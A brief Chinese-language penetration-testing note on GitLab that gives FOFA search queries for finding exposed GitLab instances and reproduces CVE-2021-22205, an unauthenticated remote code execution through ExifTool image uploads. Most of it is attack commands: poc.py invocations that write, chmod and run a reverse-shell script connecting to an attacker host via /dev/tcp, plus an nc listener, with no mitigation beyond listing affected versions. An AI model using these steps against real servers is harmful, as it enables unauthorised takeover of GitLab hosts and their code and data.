GitLab是一款Ruby开发的Git项目管理平台。
Web特征
其默认web页面在:http://host:8080/users/sign_in,端口可变,存在用户验证接口。
该产品存在标签页默认icon图标:
fofa语法:title="Sign in · GitLab" protocol="https" status_code="200"、title="GitLab"
漏洞复现
CVE-2021-22205(ExifTool导致的RCE)
在11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞CVE-2021-22204的影响,攻击者可以通过一个未授权的接口上传一张恶意构造的图片,进而在GitLab服务器上执行任意命令。
影响范围:11.9 <= GitLab(CE/EE)< 13.8.8、13.9 <= GitLab(CE/EE)< 13.9.6、13.10 <= GitLab(CE/EE)< 13.10.3
复现示例
GitLab的/uploads/user接口可以上传图片且无需认证,利用已公开的poc.py脚本进行反弹shell:
# 写入反弹shell脚本
python3 poc.py http://target-ip:8080 "echo 'bash -i >& /dev/tcp/attacker-ip/port 0>&1' > /tmp/1.sh"
# 给执行权限
python3 poc.py http://target-ip:8080 "chmod +x /tmp/1.sh"
# 攻击机监听6666端口
nc -lvnp 6666
# 运行,获取git权限shell
python3 poc.py http://target-ip:8080 "/bin/bash /tmp/1.sh"
成功反弹shell:
